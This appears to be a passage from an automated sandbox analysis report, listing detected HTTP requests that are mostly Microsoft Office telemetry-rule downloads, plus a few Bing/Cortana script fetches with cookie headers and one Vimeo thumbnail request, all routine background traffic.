          Source: global trafficHTTP traffic detected: GET /video/1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d?mw=600&mh=337 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rp/Nc4fY9Bt2xiN12EeZpnY5mhtaHc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
